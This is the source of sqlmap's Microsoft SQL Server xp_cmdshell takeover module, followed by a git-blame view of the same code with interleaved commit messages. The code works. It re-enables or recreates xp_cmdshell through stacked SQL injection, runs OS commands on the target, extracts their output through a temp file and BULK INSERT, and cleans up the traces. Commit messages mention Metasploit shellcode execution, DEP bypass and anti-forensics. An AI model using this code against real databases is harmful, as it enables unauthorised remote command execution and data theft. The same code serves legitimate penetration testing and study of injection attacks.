sqlmap/lib/takeover/xp_cmdshell.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import urlencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.request import inject
from lib.techniques.blind.timebased import timeUse

class xp_cmdshell:
    """
    This class defines methods to deal with Microsoft SQL Server
    xp_cmdshell extended procedure for plugins.
    """

    def __init__(self):
        self.xpCmdshellStr = "master..xp_cmdshell"

    def __xpCmdshellCreate(self):
        cmd = ""

        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            logger.debug("activating sp_OACreate")

            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
            self.xpCmdshellExecCmd(cmd)

        self.__randStr = randomStr(lowercase=True)

        cmd += "declare @%s nvarchar(999); " % self.__randStr
        cmd += "set @%s='" % self.__randStr
        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
        cmd += "EXEC sp_OADestroy @ID'; "
        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr

        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            cmd += " RECONFIGURE WITH OVERRIDE;"

        self.xpCmdshellExecCmd(cmd)

    def __xpCmdshellConfigure2005(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_configure "
        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        cmd  = "EXEC master..sp_configure 'show advanced options', 1; "
        cmd += "RECONFIGURE WITH OVERRIDE; "
        cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode
        cmd += "RECONFIGURE WITH OVERRIDE; "
        cmd += "EXEC sp_configure 'show advanced options', 0"

        return cmd

    def __xpCmdshellConfigure2000(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_addextendedproc "
        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        if mode == 1:
            cmd  = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
            cmd += "@dllname='xplog70.dll'"
        else:
            cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"

        return cmd

    def __xpCmdshellConfigure(self, mode):
        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            cmd = self.__xpCmdshellConfigure2005(mode)
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)

        self.xpCmdshellExecCmd(cmd)

    def __xpCmdshellCheck(self):
        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
        duration = timeUse(query)

        if duration >= conf.timeSec:
            return True
        else:
            return False

    def xpCmdshellForgeCmd(self, cmd):
        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
        forgedCmd = urlencode(forgedCmd, convall=True)

        return forgedCmd

    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
        if forgeCmd:
            cmd = self.xpCmdshellForgeCmd(cmd)

        inject.goStacked(cmd, silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
        self.getRemoteTempPath()

        tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
        cmd     = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))

        self.xpCmdshellExecCmd(cmd)

        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))

        self.delRemoteFile(tmpFile)

        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
        inject.goStacked("DELETE FROM %s" % self.cmdTblName)

        if isinstance(output, (list, tuple)):
            output = output[0]

            if isinstance(output, (list, tuple)):
                output = output[0]

        return output

    def xpCmdshellInit(self):
        self.__xpCmdshellAvailable = False

        infoMsg  = "checking if xp_cmdshell extended procedure is "
        infoMsg += "available, wait.."
        logger.info(infoMsg)

        result = self.__xpCmdshellCheck()

        if result:
            logger.info("xp_cmdshell extended procedure is available")
            self.__xpCmdshellAvailable = True

        else:
            message  = "xp_cmdshell extended procedure does not seem to "
            message += "be available. Do you want sqlmap to try to "
            message += "re-enable it? [Y/n] "
            choice   = readInput(message, default="Y")

            if not choice or choice in ("y", "Y"):
                self.__xpCmdshellConfigure(1)

                if self.__xpCmdshellCheck():
                    logger.info("xp_cmdshell re-enabled successfully")
                    self.__xpCmdshellAvailable = True

                else:
                    logger.warn("xp_cmdshell re-enabling failed")

                    logger.info("creating xp_cmdshell with sp_OACreate")
                    self.__xpCmdshellConfigure(0)
                    self.__xpCmdshellCreate()

                    if self.__xpCmdshellCheck():
                        logger.info("xp_cmdshell created successfully")
                        self.__xpCmdshellAvailable = True

                    else:
                        warnMsg  = "xp_cmdshell creation failed, probably "
                        warnMsg += "because sp_OACreate is disabled"
                        logger.warn(warnMsg)

        if not self.__xpCmdshellAvailable:
            errMsg = "unable to proceed without xp_cmdshell"
            raise sqlmapUnsupportedFeatureException, errMsg

        debugMsg  = "creating a support table to write commands standard "
        debugMsg += "output to"
        logger.debug(debugMsg)

        self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`#!/usr/bin/env python`

			`"""`
			$Id$

large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`"""`

			`from lib.core.common import randomStr`
			`from lib.core.common import readInput`
			`from lib.core.convert import urlencode`
			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.exception import sqlmapUnsupportedFeatureException`
			`from lib.request import inject`
			`from lib.techniques.blind.timebased import timeUse`

			`class xp_cmdshell:`
			`"""`
			`This class defines methods to deal with Microsoft SQL Server`
			`xp_cmdshell extended procedure for plugins.`
			`"""`

			`def __init__(self):`
			`self.xpCmdshellStr = "master..xp_cmdshell"`

			`def __xpCmdshellCreate(self):`
			`cmd = ""`

			`if kb.dbmsVersion[0] in ( "2005", "2008" ):`
			`logger.debug("activating sp_OACreate")`

			`cmd += "EXEC master..sp_configure 'show advanced options', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`self.xpCmdshellExecCmd(cmd)`

			`self.__randStr = randomStr(lowercase=True)`

			`cmd += "declare @%s nvarchar(999); " % self.__randStr`
			`cmd += "set @%s='" % self.__randStr`
			`cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "`
			`cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "`
			`cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "`
			`cmd += "EXEC sp_OADestroy @ID'; "`
			`cmd += "EXEC master..sp_executesql @%s;" % self.__randStr`

			`if kb.dbmsVersion[0] in ( "2005", "2008" ):`
			`cmd += " RECONFIGURE WITH OVERRIDE;"`

			`self.xpCmdshellExecCmd(cmd)`

			`def __xpCmdshellConfigure2005(self, mode):`
			`debugMsg = "configuring xp_cmdshell using sp_configure "`
			`debugMsg += "stored procedure"`
			`logger.debug(debugMsg)`

			`cmd = "EXEC master..sp_configure 'show advanced options', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC sp_configure 'show advanced options', 0"`

			`return cmd`

			`def __xpCmdshellConfigure2000(self, mode):`
			`debugMsg = "configuring xp_cmdshell using sp_addextendedproc "`
			`debugMsg += "stored procedure"`
			`logger.debug(debugMsg)`

			`if mode == 1:`
			`cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "`
			`cmd += "@dllname='xplog70.dll'"`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`else:`
Minor fix 2010-05-10 18:18:41 +04:00			`cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`return cmd`

			`def __xpCmdshellConfigure(self, mode):`
			`if kb.dbmsVersion[0] in ( "2005", "2008" ):`
			`cmd = self.__xpCmdshellConfigure2005(mode)`
			`else:`
			`cmd = self.__xpCmdshellConfigure2000(mode)`

			`self.xpCmdshellExecCmd(cmd)`

			`def __xpCmdshellCheck(self):`
Major bug fix in takeover functionalities on Microsoft SQL Server 2010-01-29 03:09:05 +03:00			`query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`duration = timeUse(query)`

			`if duration >= conf.timeSec:`
			`return True`
			`else:`
			`return False`

			`def xpCmdshellForgeCmd(self, cmd):`
Major bug fix in takeover functionalities on Microsoft SQL Server 2010-01-29 03:09:05 +03:00			`forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)`
			`forgedCmd = urlencode(forgedCmd, convall=True)`

			`return forgedCmd`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if forgeCmd:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`cmd = self.xpCmdshellForgeCmd(cmd)`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`inject.goStacked(cmd, silent)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00			`def xpCmdshellEvalCmd(self, cmd, first=None, last=None):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`self.getRemoteTempPath()`

sqlmap does not save nor leave back in temporary folder any file named 'sqlmapRANDOM', only random names now, less suspicious 2010-02-26 16:13:50 +03:00			`tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`cmd = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))`

			`self.xpCmdshellExecCmd(cmd)`

Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00			`inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
sqlmap 0.8-rc2: minor enhancement based on msfencode 3.3.3-dev -t exe-small so that also PostgreSQL supports again the out-of-band via Metasploit payload stager optionally to shellcode execution in-memory via sys_bineval() UDF. Speed up OOB connect back. Cleanup target file system after --os-pwn too. Minor bug fix to correctly forge file system paths with os.path.join() all around. Minor code refactoring and user's manual update. 2009-12-18 01:04:01 +03:00			`self.delRemoteFile(tmpFile)`
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)`
			`inject.goStacked("DELETE FROM %s" % self.cmdTblName)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`if isinstance(output, (list, tuple)):`
			`output = output[0]`

			`if isinstance(output, (list, tuple)):`
			`output = output[0]`

			`return output`

Avoid useless checks for --os-bof (no need to check for DBA or for xp_cmdshell). Minor code restyling. 2010-01-04 18:02:56 +03:00			`def xpCmdshellInit(self):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`self.__xpCmdshellAvailable = False`

			`infoMsg = "checking if xp_cmdshell extended procedure is "`
			`infoMsg += "available, wait.."`
			`logger.info(infoMsg)`

			`result = self.__xpCmdshellCheck()`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if result:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell extended procedure is available")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`message = "xp_cmdshell extended procedure does not seem to "`
			`message += "be available. Do you want sqlmap to try to "`
			`message += "re-enable it? [Y/n] "`
			`choice = readInput(message, default="Y")`

			`if not choice or choice in ("y", "Y"):`
			`self.__xpCmdshellConfigure(1)`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if self.__xpCmdshellCheck():`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell re-enabled successfully")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`logger.warn("xp_cmdshell re-enabling failed")`

			`logger.info("creating xp_cmdshell with sp_OACreate")`
			`self.__xpCmdshellConfigure(0)`
			`self.__xpCmdshellCreate()`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if self.__xpCmdshellCheck():`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell created successfully")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`warnMsg = "xp_cmdshell creation failed, probably "`
			`warnMsg += "because sp_OACreate is disabled"`
			`logger.warn(warnMsg)`

Avoid useless checks for --os-bof (no need to check for DBA or for xp_cmdshell). Minor code restyling. 2010-01-04 18:02:56 +03:00			`if not self.__xpCmdshellAvailable:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`errMsg = "unable to proceed without xp_cmdshell"`
			`raise sqlmapUnsupportedFeatureException, errMsg`

			`debugMsg = "creating a support table to write commands standard "`
			`debugMsg += "output to"`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`logger.debug(debugMsg)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Minor bug fix to --os-cmd/--os-shell for Microsoft SQL Server 2009-07-25 15:45:23 +04:00			`self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")`